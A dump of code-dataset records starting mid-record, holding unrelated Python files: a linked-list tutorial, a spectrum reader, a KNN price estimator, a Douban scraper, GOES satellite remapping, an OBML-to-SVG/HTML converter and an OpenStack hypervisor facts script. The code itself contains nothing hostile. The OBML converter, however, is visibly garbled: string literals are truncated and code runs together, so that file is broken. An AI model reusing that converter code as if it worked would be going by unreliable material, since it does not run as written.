key, value\n    return obj\n\ndef abbrev(obj):\n    if istuple(obj):\n        key, value = obj\n        if key[-3:] in ('crt', 'csr', 'key'):\n            lines = value.split('\\n')\n            lines = lines[:2] + ['...'] + lines[-3:]\n            from pprint import pprint\n            pprint(dict(lines=lines))\n            value = '\\n'.join(lines)\n        return key, value\n    return obj\n\ndef visit(obj, func=printit):\n    obj1 = None\n    if isdict(obj):\n        obj1 = {}\n        for key, value in obj.items():\n            if isscalar(value):\n                key1, value1 = visit((key, value), func=func)\n            else:\n                key1 = key\n                value1 = visit(value, func=func)\n            obj1[key1] = value1\n    elif islist(obj):\n        obj1 = []\n        for item in obj:\n            obj1.append(visit(item, func=func))\n    elif isscalar(obj) or istuple(obj) and len(obj) == 2:\n        obj1 = func(obj)\n    else:\n        raise VisitError(obj)\n    return obj1\n","sub_path":"api/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"313197504","text":"\"\"\" \r\nLinked list \r\n\"\"\"\r\n\r\n\r\n# Node class representation\r\nclass Node:\r\n    def __init__(self, data): # initializer\r\n        self.data = data # data holds the stored value\r\n        self.next = None # stores a reference to the next node
\r\n\r\nclass LinkedList:\r\n    def __init__(self): # empty initializer\r\n        self.head = None # the head of the linked list\r\n\r\n    def append(self, data): # appends an element to the list\r\n        new_node = Node(data) # wrap the value in a new node\r\n        if self.head == None: # when the list is empty\r\n            self.head = new_node\r\n            return # if the list was empty, the new node becomes the head\r\n\r\n        current_node = self.head\r\n\r\n        while current_node.next: # walk the whole structure\r\n            current_node = (\r\n                current_node.next\r\n            ) # take each current node and step to the next one\r\n        current_node.next = new_node # attach at the end once the condition fails\r\n        return\r\n\r\n    def length(self): # computes the length\r\n        if self.head is None: # check whether the head is empty\r\n            return 0\r\n        current_node = self.head\r\n        total = 0 # Init count\r\n        # Loop while end of linked list is not reached\r\n        while current_node: # while it is truthy\r\n            total += 1 # increment our counter\r\n            current_node = current_node.next # jump to the next node\r\n        return total\r\n\r\n    def to_list(self): # converts the linked list back into a plain list\r\n        node_data = [] # start with an empty array\r\n        current_node = self.head # point the current node at the head\r\n\r\n        # walk the linked list and push its values into the array\r\n        while current_node:\r\n            node_data.append(current_node.data) # save the current value\r\n            current_node = current_node.next\r\n        return node_data\r\n\r\n    # returns the value of the node at an index\r\n    def get(self, index):\r\n        if index >= self.length() or index < 0:\r\n            print(\"ERROR: 'Get' Index out of range!\")\r\n            return None\r\n        current_idx = 0\r\n        current_node = self.head\r\n        while current_node != None:\r\n            if current_idx == index:\r\n                return current_node.data\r\n            current_node = current_node.next\r\n            current_idx += 1\r\n\r\n    # reverse a linked list\r\n    def reverse_linkedlist(self): # flip the arrows of the structure\r\n        previous_node = None # start out empty\r\n        current_node = self.head # current node\r\n\r\n        # while walking the list, reverse each node's link\r\n        while current_node != None:\r\n            next = current_node.next # the node after the current one\r\n            current_node.next = previous_node # point the current node at the previous one\r\n            previous_node = current_node # the previous becomes the current node\r\n            current_node = next # advance the current node to next\r\n        self.head = previous_node # the head ends up being the last node visited\r\n\r\n    # search for a matching element by walking the linked list\r\n    def search_item(self, value):\r\n        if self.head == None:\r\n            print(\"List has no elements\")\r\n            return\r\n        current_node = self.head\r\n        while current_node != None:\r\n            if current_node.data == value:\r\n                print(\"Item found\")\r\n                return True\r\n            current_node = current_node.next\r\n        print(\"Item not found\")\r\n        return False\r\n\r\n    def display(self): # prints the elements of the linked list\r\n        contents = self.head\r\n        # If the list is null\r\n        if contents is None: # if the contents are null the list has no element\r\n            print(\"List has no element\")\r\n        while contents: # walk the list and print below\r\n            print(contents.data)\r\n            contents = contents.next\r\n        print(\"----------\") # separator print\r\n\r\n    # remove an element or item at the start\r\n    def remove_at_start(self):\r\n        if self.head == None:\r\n            print(\"The list has no element to delete\")\r\n            return\r\n        self.head = self.head.next
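\r\n\r\n    # (Added note) remove_at_end below is O(n): a singly linked list must be\r\n    # walked from the head to find the second-to-last node.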
\r\n    # remove an element or an item at the end\r\n    def remove_at_end(self):\r\n        if self.head is None:\r\n            print(\"The list has no element to delete\")\r\n            return\r\n        if self.head.next is None: # bug fix: a one-element list has no .next.next\r\n            self.head = None\r\n            return\r\n        current_node = self.head\r\n        while current_node.next.next != None:\r\n            current_node = current_node.next\r\n        current_node.next = None\r\n\r\n    # Remove a node with a specific value\r\n    def remove_element_by_value(self, value):\r\n        # Store head node\r\n        current_node = self.head\r\n\r\n        # If head node itself holds the value to be deleted\r\n        if current_node != None:\r\n            if current_node.data == value:\r\n                self.head = current_node.next\r\n                current_node = None\r\n                return\r\n\r\n        # Search for the value to be deleted, keep track of the\r\n        # previous node as we need to change 'prev.next'\r\n        while current_node != None:\r\n            if current_node.data == value:\r\n                break\r\n            prev = current_node\r\n            current_node = current_node.next\r\n\r\n        # if value was not present in linked list\r\n        if current_node == None:\r\n            return\r\n\r\n        # Unlink the node from linked list\r\n        prev.next = current_node.next\r\n        current_node = None\r\n\r\n    # Insert an item in a single linked list\r\n    # add an item at the start of the list\r\n    def insert_at_start(self, data):\r\n        new_node = Node(data)\r\n        new_node.next = self.head\r\n        self.head = new_node\r\n\r\n    # Insert an item in a single linked list\r\n    # add an item at the end of the list\r\n    def insert_at_end(self, data):\r\n        new_node = Node(data)\r\n        if self.head is None:\r\n            self.head = new_node\r\n            return\r\n        current_node = self.head\r\n        while current_node.next is not None:\r\n            current_node = current_node.next\r\n        current_node.next = new_node\r\n\r\n    # Insert an item in a single linked list\r\n    # add an item at any index of the list\r\n    def insert_at_index(self, index, data):\r\n        if index == 1:\r\n            new_node = Node(data)\r\n            new_node.next = self.head\r\n            self.head = new_node\r\n            return # bug fix: without this return the element was inserted twice\r\n        i = 1\r\n        current_node = self.head\r\n        while i < index - 1 and current_node is not None:\r\n            current_node = current_node.next\r\n            i = i + 1\r\n        if current_node is None:\r\n            print(\"ERROR: Index out of range!\")\r\n        else:\r\n            new_node = Node(data)\r\n            new_node.next = current_node.next\r\n            current_node.next = new_node\r\n\r\n\r\n# Test\r\nlistaEncadeada = LinkedList()\r\nlistaEncadeada.display()\r\n# Add the elements\r\nlistaEncadeada.append(9)\r\nlistaEncadeada.append(3)\r\nlistaEncadeada.append(8)\r\nlistaEncadeada.append(2)\r\n\r\nlistaEncadeada.display()\r\n\r\nprint(\"The total number of elements are: \" + str(listaEncadeada.length()))\r\nprint(listaEncadeada.to_list()) # Python list\r\nprint(\"---------\")\r\nlistaEncadeada.reverse_linkedlist() # Reverse linked list\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.search_item(9)\r\nlistaEncadeada.search_item(99)\r\n\r\nlistaEncadeada.remove_at_start()\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.remove_at_end()\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_start(1)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_end(3)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.remove_element_by_value(3)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_index(2, 88)\r\nlistaEncadeada.display()\r\n","sub_path":"08_Class/exemplo05.py","file_name":"exemplo05.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"27578880","text":"from __future__ import print_function\n\n\ndef read_spectrum(filename,\n                  return_type=int):\n    \"\"\"\n    Reads a .spe file into a numpy array.\n\n    Parameters:\n    -----------\n    
filename : string\n        Filename with .spe extension\n    return_type : int or float\n        Type of number to return\n    Returns:\n    --------\n    spectrum : vector\n        The source spectrum\n\n    \"\"\"\n\n    try:\n        with open(filename, 'r') as myFile:\n            filecontent = myFile.readlines()\n        for index, line in enumerate(filecontent):\n            if '$DATA:' in line:\n                break\n        spec_len_index = index + 1\n        spec_index = index + 2\n        spec_len = filecontent[spec_len_index]\n    except UnicodeDecodeError:\n        with open(filename, 'rb') as myFile:\n            filecontent = myFile.readlines()\n        for index, line in enumerate(filecontent):\n            if b'$DATA:' in line:\n                break\n        spec_len_index = index + 1\n        spec_index = index + 2\n        spec_len = filecontent[spec_len_index].decode()[:-2]\n    except Exception: # bug fix (assumed intent): this was 'else', which printed on every successful read\n        print('spe in unknown encoding')\n\n    spec_len = int(spec_len.split(' ')[1]) + 1\n    spectrum = [return_type(x) for x in filecontent[spec_index:\n                                                    spec_index + spec_len]]\n    return spectrum\n","sub_path":"annsa/annsa.py","file_name":"annsa.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"245366416","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/18 9:03\n# @Author : Valette\n# @Email : foxmail\n# @File : KNN_find_price.py\n# @Software: PyCharm\nimport numpy as np\nfrom math import sqrt\nfrom position_makeup import get_geo_pos\nfrom mysql_connection import cur\n\n\ndef find_price(location, region=\"黄岛\"):\n    user_pos_data = get_geo_pos(location, region)\n    if user_pos_data.__len__() > 0 and 'location' in user_pos_data[0].keys():\n        user_pos = [user_pos_data[0]['location']['lng'], user_pos_data[0]['location']['lat']]\n\n        cur.execute('SELECT `坐标`, `参考单价` FROM `楼盘` WHERE `坐标` IS NOT NULL AND `参考单价` IS NOT NULL')\n        datas = cur.fetchall()\n        x_pos = []\n        y_price = []\n        for data in datas:\n            t_pos = data[0].split(\",\")\n            x_pos.append([float(i) for i in t_pos])\n            y_price.append(data[1])\n\n        x_train = np.array(x_pos)\n        y_train = np.array(y_price)\n        x = np.array(user_pos)\n        # The KNN procedure\n        # compute the distance from every point to x, sort in ascending order, take the first k, and tally the votes of those k samples\n        distances = [sqrt(np.sum((x_t-x)**2)) for x_t in x_train]\n        nearest = np.argsort(distances)\n        # we fix the value of k at 5\n        k = 5\n        topK_y = [y_train[i] for i in nearest[:k]]\n        print(topK_y)\n\n        # aggregate the result\n        average = np.mean(topK_y)\n        print(\"Estimated price around {}: {} yuan per square metre\".format(location, average))\n        return average\n    else:\n        print(\"Could not find your location: {}-{}\".format(location, region))\n        return None\n\n\nif __name__ == '__main__':\n    find_price(\"山东科技大学\")\n","sub_path":"KNN_find_price.py","file_name":"KNN_find_price.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"399815569","text":"from lxml import etree\r\nimport requests\r\n\r\ndef get_url(url):\r\n\tresp = requests.get(url)\r\n\tfp = open('douban.html','w',encoding = 'utf-8')\r\n\tfp.write(resp.content.decode('utf-8'))\r\n\thtml = 'douban.html'\r\n\treturn html\r\n\r\n\r\ndef get_info(html):\r\n\tparser = etree.HTMLParser(encoding = 'utf-8')\r\n\thtml = etree.parse(html,parser = parser)\r\n\tmovies = html.xpath(\".//ol[@class='grid_view']/li\")\r\n\tmovies_info = []\r\n\tfor movie in movies:\r\n\t\tname = movie.xpath(\".//span[@class = 'title']/text()\")[0]\r\n\t\tlink = movie.xpath(\".//div[@class= 'pic']/a/@href\")[0]\r\n\t\tmovie_info = movie.xpath(\".//p[@class='']/text()\")[0]\r\n\t\tstar = movie.xpath(\".//div[@class='star']/span[@class='rating_num']/text()\")[0]\r\n\t\taudience = 
movie.xpath(\".//div[@class='star']/span[4]/text()\")[0]\r\n\t\tquote = movie.xpath(\".//span[@class = 'inq']/text()\")[0]\r\n\r\n\t\tmovie_info = {\r\n\t\t'name':name,\r\n\t\t'link':link,\r\n\t\t'movie_info':movie_info,\r\n\t\t'star':star,\r\n\t\t'audience':audience,\r\n\t\t'quote':quote\r\n\t\t}\r\n\t\tmovies_info.append(movie_info)\r\n\r\n\tfor movie_info in movies_info:\r\n\t\tprint(movie_info)\r\n\t\tprint('\\n')\r\n\r\n\r\ndef spider():\r\n\tbase_url = 'https://movie.douban.com/top250?start={}&filter='\r\n\tdetail_urls = []\r\n\tfor x in range(0,100,25):\r\n\t\tdetail_url = base_url.format(x)\r\n\t\tdetail_urls.append(detail_url)\r\n\tfor detail_url in detail_urls:\r\n\t\thtml = get_url(detail_url)\r\n\t\tget_info(html)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tspider()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"web-crawling-projects/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179740132","text":"def get_row(rowIndex):\n # Method 1\n # ans = [0] * (rowIndex + 1)\n # ans[0] = 1\n # for i in range(1, rowIndex + 1):\n # for j in range(i, 0, -1):\n # ans[j] += ans[j-1]\n #\n # return ans\n\n # Method 2\n row = [1]\n for _ in range(rowIndex):\n row = [x + y for x,y in zip([0] + row, row + [0])]\n\n return row\n\n\n\n\nprint(get_row(5))\n","sub_path":"pascal_triangle_II.py","file_name":"pascal_triangle_II.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413006798","text":"import time as t\r\n\r\nimport numpy as np\r\nfrom netCDF4 import Dataset\r\nfrom osgeo import gdal\r\nfrom osgeo import osr\r\n\r\n# Define KM_PER_DEGREE\r\nKM_PER_DEGREE = 111.32\r\n\r\n# GOES-16 Extent (satellite projection) [llx, lly, urx, ury]\r\n\r\n# GOES16_EXTENT = [-5434894.885056, -5434894.885056, 5434894.885056, 5434894.885056]\r\n\r\n# GOES-16 Spatial Reference System\r\nsourcePrj = osr.SpatialReference()\r\nsourcePrj.ImportFromProj4('+proj=geos +h=35786023.0 +a=6378137.0 +b=6356752.31414 +f=0.00335281068119356027 '\r\n '+lat_0=0.0 +lon_0=-75.0 +sweep=x +no_defs')\r\n\r\n# Lat/lon WSG84 Spatial Reference System\r\ntargetPrj = osr.SpatialReference()\r\ntargetPrj.ImportFromProj4('+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')\r\n\r\n\r\ndef export_image(image, path):\r\n driver = gdal.GetDriverByName('netCDF')\r\n return driver.CreateCopy(path, image, 0)\r\n\r\n\r\ndef get_geo_t(extent, nlines, ncols):\r\n # Compute resolution based on data dimension\r\n resx = (extent[2] - extent[0]) / ncols\r\n resy = (extent[3] - extent[1]) / nlines\r\n return [extent[0], resx, 0, extent[3], 0, -resy]\r\n\r\n\r\ndef get_scale_offset(path, var):\r\n nc = Dataset(path)\r\n scale = nc.variables[var].scale_factor\r\n offset = nc.variables[var].add_offset\r\n nc.close()\r\n return scale, offset\r\n\r\n\r\ndef get_extent(path, var):\r\n nc = Dataset(path)\r\n h = nc.variables['goes_imager_projection'].perspective_point_height\r\n x1 = nc.variables['x_image_bounds'][0] * h\r\n x2 = nc.variables['x_image_bounds'][1] * h\r\n y1 = nc.variables['y_image_bounds'][1] * h\r\n y2 = nc.variables['y_image_bounds'][0] * h\r\n goes_extent = [x1, y1, x2, y2]\r\n nc.close()\r\n return goes_extent\r\n\r\n\r\ndef remap(path, extent, resolution, driver, var):\r\n # Read scale/offset from file\r\n\r\n # scale, offset = getScaleOffset(path,var)\r\n goes_extent = get_extent(path, var)\r\n # Build connection info based 
on given driver name\r\n if driver == 'NETCDF':\r\n connection_info = 'NETCDF:\\\"' + path + '\\\":' + var\r\n else: # HDF5\r\n connection_info = 'HDF5:\\\"' + path + '\\\"://' + var\r\n # Open NetCDF file (GOES-16 data) \r\n raw = gdal.Open(connection_info, gdal.GA_ReadOnly)\r\n # Setup projection and geo-transformation\r\n raw.SetProjection(sourcePrj.ExportToWkt())\r\n raw.SetGeoTransform(get_geo_t(goes_extent, raw.RasterYSize, raw.RasterXSize))\r\n # Compute grid dimension\r\n if resolution is not None:\r\n sizex = int(((extent[2] - extent[0]) * KM_PER_DEGREE) / resolution) - 1\r\n sizey = int(((extent[3] - extent[1]) * KM_PER_DEGREE) / resolution) - 1\r\n # print(sizex, sizey)\r\n else:\r\n sizex = raw.RasterXSize\r\n sizey = raw.RasterYSize\r\n # Get memory driver\r\n mem_driver = gdal.GetDriverByName('MEM')\r\n # Create grid\r\n grid = mem_driver.Create('grid', sizex, sizey, 1, gdal.GDT_Float32)\r\n # Setup projection and geo-transformation\r\n grid.SetProjection(targetPrj.ExportToWkt())\r\n grid.SetGeoTransform(get_geo_t(extent, grid.RasterYSize, grid.RasterXSize))\r\n # Perform the projection/resampling\r\n # print('Remapping', path)\r\n start = t.time()\r\n gdal.ReprojectImage(raw, grid, sourcePrj.ExportToWkt(), targetPrj.ExportToWkt(), gdal.GRA_NearestNeighbour,\r\n options=['NUM_THREADS=ALL_CPUS'])\r\n # print('- finished! Time:', t.time() - start, 'seconds')\r\n # Read grid data\r\n array = grid.ReadAsArray()\r\n # Mask fill values (i.e. invalid values)\r\n np.ma.masked_where(array, array == -1, False)\r\n return grid, array\r\n","sub_path":"src/plotters_lib/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261932993","text":"#!/usr/bin/env python3\n#coding:utf8\n\nfrom sys import argv, stderr\nfrom base64 import b64encode\nfrom os import system as polecenie\n\n# ustawienia\nsvgz='nie' # nie, większe, mniejsze, tak\n\n# informacje o przebiegu pracy\nmrucz=[\n 'złe',\n #'dobre',\n #'dobre krótko',\n 'dobre b. 
krótko',\n #'I',\n #'F',\n #'F²',\n #'pierwszy S',\n #'nieznane',\n #'pięciobajt',\n 'plik',\n #'objętość',\n #'porcja',\n 'tytuł',\n #'Mu',\n #'MC',\n #'T',\n #'obrazki',\n #'certyfikat',\n #'frędzle',\n #'pióroN'\n]\n# „stałe”\nrodzajePól={\n 83 : ['input','color'],\n 97 : ['textarea',False],\n 99 : ['input','checkbox'],\n 112 : ['input','password'],\n 114 : ['input','radio'],\n 115 : ['select',False],\n 120 : ['input','text']\n}\npoprawkiPól={'input':[2,6,6],'select':[0,18,0],'textarea':[0,0,0]}\nlistaKolorów={'#c0c0c0':'silver','#808080':'gray','#800000':'maroon','#ff0000':'red','#800080':'purple','#008000':'green','#808000':'olive','#000080':'navy','#008080':'teal','#f0ffff':'azure','#f5f5dc':'beige','#ffe4c4':'bisque','#a52a2a':'brown','#ff7f50':'coral','#ffd700':'gold','#4b0082':'indigo','#fffff0':'ivory','#f0e68c':'khaki','#faf0e6':'linen','#da70d6':'orchid','#cd853f':'peru','#ffc0cb':'pink','#dda0dd':'plum','#fa8072':'salmon','#a0522d':'sienna','#fffafa':'snow','#d2b48c':'tan','#ff6347':'tomato','#ee82ee':'violet','#f5deb3':'wheat'}\nCSS='\\ttext {font-size:12px;font-family:sans-serif}\\n\\ta > rect {fill:#0000f0;fill-opacity:0.1;stroke:#0000f0;stroke-width:2}\\n\\ta {opacity:0}\\n\\ta:hover {opacity:1}\\n\\n\\tbody {margin:0px}\\n\\tinput, select {position:absolute;box-sizing:border-box;background:none;border:none;margin:0}\\n\\tdiv[id] {position:absolute;width:1px;height:1px}\\n'\n\n# funkcje\ndef naLinijki(tekst,x,y,rozmiar):\n wynik=''\n y+=rozmiar\n tekst=tekst.replace('&','&').replace('<','<').replace('>','>')\n if tekst.count('\\n'):\n tekst=tekst.split('\\n')\n odgóry=y\n wynik+='>'\n for linia in tekst:\n wynik+='%s' %(x,odgóry,linia)\n odgóry=round(1.33*rozmiar+odgóry,3)\n else:\n wynik+=' x=\"%s\" y=\"%s\">%s' %(x,y,tekst)\n return wynik\n\ndef zsumuj(*liczby):\n wynik=0\n dł=len(liczby)\n if dł==1:\n liczby=liczby[0]\n dł=len(liczby)\n for i in range(dł):\n wynik+=liczby[i]*256**(dł-i-1)\n return wynik\n\ndef dajZnać(oCzym):\n print (oCzym,file=stderr)\n\ndef lidżbajty(a):\n wynik=''\n for i in a:\n wynik+='%3s ' %i\n return (wynik)\n\ndef barwa(r,g,b):\n rgb='#%02x%02x%02x' %(r,g,b)\n if rgb in listaKolorów:\n return listaKolorów[rgb]\n if rgb[1:6:2]==rgb[2:7:2]:\n rgb=rgb[0:7:2]\n return rgb\n\ndef przetwórz(dane, ścieżkaWyjścia):\n WSTĘP='\\n'\n HTML=''\n SVG='3:\n dajZnać('formatowanie %s na %s miejscu — %s' %(daneZ[16],odl,daneZ[20+frędzle:20+frędzle+zsumuj(daneZ[18+frędzle:20+frędzle])].decode()))\n SVG+=' style=\"%s\"' %styl[:-1] if styl else ''\n SVG+=' opacity=\"%s\"' %round(daneZ[11]/255.0,3) if daneZ[11]<255 else ''\n SVG+=' fill=\"%s\"' %barwa(daneZ[12],daneZ[13],daneZ[14]) if (daneZ[12],daneZ[13],daneZ[14])!=(0,0,0) else ''\n pióroBok=(pióroBok+zsumuj(daneZ[1:3]))%NW_SZER\n pióroDół=(pióroDół+zsumuj(daneZ[3:6]))%NW_SZER\n SVG+=naLinijki(daneZ[20+frędzle:20+frędzle+zsumuj(daneZ[18+frędzle:20+frędzle])].decode(),pióroBok,pióroDół,rozmiar)+'\\n'\n if mrucz.count('T'):\n dajZnać(lidżbajty(daneZ[6:12]))\n dajZnać(lidżbajty(daneZ[15:18+frędzle]))\n if mrucz.count('frędzle') and frędzle:\n dajZnać('frędzle: %s' %frędzle)\n odl+=19+zsumuj(daneZ[18+frędzle:20+frędzle])+frędzle\n #0-14,18-19\n elif bajt==0x42: #B\n if poprzednioEn:\n pióroBok = 0\n pióroDół = 0\n poprzednioEn = False\n byłoBe=True\n pióroBok=(pióroBok+zsumuj(daneZ[1:3]))%NW_SZER\n pióroDół=(pióroDół+zsumuj(daneZ[3:6]))%NW_SZER\n SVG+=''+chr(daneZ[18])+'<')\n elif bajt==0x53: #S\n if znaczenieS=='jakDługoIPolem':\n zasięgPodmiotów=odl+zsumuj(daneZ[1:4])\n if mrucz.count('pierwszy S'):\n 
dajZnać(lidżbajty(daneZ[1:4]))\n znaczenieS='plecak, guziki'\n możliwaRozwijka=True\n odl+=3\n elif znaczenieS=='plecak, guziki' and odl=zasięgPodmiotów:\n rozmiarPlecaka=zsumuj(daneZ[1:4])\n stemple=daneZ[4:4+rozmiarPlecaka]\n nr=0\n while nr','\\n' %CSS))\n tymczasowy.close()\n \n polecenie('cat obml_svg.tpm | gzip > obml_svg.2.tpm')\n polecenie('base64 -w 0 obml_svg.2.tpm > obml_svg.tpm')\n \n tymczasowy=open('obml_svg.tpm','r')\n zbasowany=tymczasowy.read()\n tymczasowy.close()\n \n polecenie('rm obml_svg.tpm obml_svg.2.tpm')\n \n zbasowany='' %zbasowany\n \n if svgz=='tak' or ( svgz=='mniejsze' and len(zbasowany)len(SVG) ):\n SVG=zbasowany\n\n wyjście=open(ścieżkaWyjścia,'w')\n print (WSTĘP,file=wyjście)\n print ('' %CSS,file=wyjście)\n print (SVG,file=wyjście)\n print (HTML,file=wyjście)\n wyjście.close()\n\nif len(argv)==1:\n print (\"Nie podano pliku\", file=stderr)\n quit()\n#for nazwaPlikuObml in argv[1:]:\nfor nazwaPlikuObml in argv[1:]: #Ẃelḱe os^ustfo\n if mrucz.count('plik'):\n dajZnać(nazwaPlikuObml)\n \n try:\n plikObml=open(nazwaPlikuObml,'rb')\n except IOError:\n print (\"Nie ma takiego pliku\", file=stderr)\n continue\n \n dane=plikObml.read()\n plikObml.close()\n przetwórz(dane,nazwaPlikuObml[:-6]+'html')","sub_path":"obml7NaSvgIHtml.py","file_name":"obml7NaSvgIHtml.py","file_ext":"py","file_size_in_byte":21240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271500695","text":"\n\nfrom xai.brain.wordbase.verbs._gyrate import _GYRATE\n\n#calss header\nclass _GYRATING(_GYRATE, ):\n\tdef __init__(self,): \n\t\t_GYRATE.__init__(self)\n\t\tself.name = \"GYRATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"gyrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_gyrating.py","file_name":"_gyrating.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13000689","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String)\n star = db.Column(db.Float)\n img = db.Column(db.String)\n \n def __init__(self,title,star,img):\n self.title = title\n self.star = star\n self.img = img","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575084060","text":"#!/usr/bin/python\r\n\r\nimport os\r\nimport json\r\nimport argparse\r\nimport logging\r\nimport datetime\r\nimport calendar\r\nimport requests\r\nimport glob\r\n\r\nfrom keystoneauth1 import loading\r\nfrom keystoneauth1 import session\r\n\r\nfrom keystoneclient import client as keystone_client\r\nfrom novaclient import client as nova_client\r\n\r\ndef deep_compare(obj):\r\n if isinstance(obj, dict):\r\n return sorted((k, deep_compare(v)) for k, v in obj.items())\r\n if isinstance(obj, list):\r\n return sorted(deep_compare(x) for x in obj)\r\n else:\r\n return obj\r\n\r\ndef doParseArgs(config):\r\n \"\"\"Parse args and return a config dict\"\"\"\r\n\r\n parser = argparse.ArgumentParser(description='Generate accounting records for OpenStack instances', epilog='-D and -A are mutually exclusive')\r\n parser.add_argument(\"-v\", \"--verbose\", help=\"output debugging information\", action=\"store_true\")\r\n parser.add_argument(\"-C\", \"--config-file\", help=\"Configuration file\")\r\n 
parser.add_argument(\"-o\", \"--outdir\", help=\"Output directory\")\r\n\r\n args = parser.parse_args()\r\n\r\n\r\n config['loglevel']=logging.CRITICAL\r\n config['config_file'] = '/path/to/config.conf'\r\n\r\n if args.config_file:\r\n config['config_file'] = args.config_file\r\n\r\n config['outdir'] = '.'\r\n if args.outdir:\r\n config['outdir'] = args.outdir\r\n\r\n if args.verbose:\r\n config['loglevel']=logging.INFO\r\n\r\n return config\r\n\r\ndef doReadConfig(config):\r\n try:\r\n f = open(config['config_file'], 'r')\r\n except IOError:\r\n return\r\n else:\r\n newconfig = json.load(f)\r\n config.update(newconfig)\r\n\r\ndef get_keystone_creds():\r\n d = {}\r\n d['OS_USERNAME'] = os.environ.get('OS_USERNAME')\r\n d['OS_PASSWORD'] = os.environ.get('OS_PASSWORD')\r\n d['OS_AUTH_URL'] = os.environ.get('OS_AUTH_URL')\r\n d['OS_PROJECT_NAME'] = os.environ.get('OS_PROJECT_NAME')\r\n d['OS_REGION_NAME'] = os.environ.get('OS_REGION_NAME')\r\n d['OS_PROJECT_DOMAIN_NAME'] = os.environ.get('OS_PROJECT_DOMAIN_NAME')\r\n d['OS_USER_DOMAIN_NAME'] = os.environ.get('OS_USER_DOMAIN_NAME')\r\n d['OS_IDENTITY_API_VERSION'] = os.environ.get('OS_IDENTITY_API_VERSION')\r\n d['OS_INTERFACE'] = os.environ.get('OS_INTERFACE')\r\n return d\r\n\r\ndef getData(config):\r\n auth=get_keystone_creds()\r\n\r\n loader = loading.get_plugin_loader('password')\r\n keystone = loader.load_from_options(auth_url=auth['OS_AUTH_URL'],\r\n username=auth['OS_USERNAME'],\r\n password=auth['OS_PASSWORD'],\r\n project_name=auth['OS_PROJECT_NAME'],\r\n user_domain_name=auth['OS_USER_DOMAIN_NAME'],\r\n project_domain_name=auth['OS_PROJECT_DOMAIN_NAME']\r\n )\r\n\r\n sess = session.Session(auth=keystone)\r\n nova = nova_client.Client(2.1, session=sess)\r\n\r\n hvs=[]\r\n hv_status={}\r\n\r\n for nc in nova.hypervisors.list(detailed=True):\r\n hv={}\r\n hv['id']=nc.id\r\n hv['hypervisor_hostname']=nc.hypervisor_hostname\r\n hv['vcpus']=nc.vcpus\r\n hv['memory_mb']=nc.memory_mb\r\n hvs.append(hv)\r\n\r\n hv_status['hypervisors']=hvs\r\n ts = datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n hv_status['ts']=ts\r\n return hv_status\r\n\r\ndef getLatestFacts(config):\r\n file_list = glob.glob(config['outdir'] + \"//hypervisor_facts_*.json\")\r\n\r\n if len(file_list) == 0:\r\n return {\"hypervisors\": []}\r\n\r\n newest = max(file_list, key=lambda d: datetime.datetime.strptime(d, \"{}/hypervisor_facts_%Y-%m-%dT%H:%M:%S.json\".format(config['outdir'])))\r\n\r\n f=open(newest, 'r')\r\n latest_facts=json.load(f)\r\n\r\n return latest_facts\r\n\r\ndef isNewData(config,data):\r\n latest_facts = getLatestFacts(config)\r\n if deep_compare(latest_facts['hypervisors']) == deep_compare(data['hypervisors']):\r\n logging.info(\"No new facts found\")\r\n return False\r\n else:\r\n logging.info(\"New facts found\")\r\n return True\r\n\r\ndef main ():\r\n\r\n config={}\r\n\r\n doParseArgs(config)\r\n doReadConfig(config)\r\n\r\n logging.basicConfig(\r\n format='%(asctime)s [%(levelname)s] %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n level=config['loglevel']\r\n )\r\n\r\n\r\n data = getData(config)\r\n\r\n if isNewData(config, data):\r\n nowtime = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')\r\n json_out = \"{}/hypervisor_facts_{}.json\".format(config['outdir'], nowtime)\r\n with open(json_out, 'w') as outfile:\r\n json.dump(data, outfile, indent=2, sort_keys=True)\r\n\r\nif __name__ == \"__main__\":\r\n 
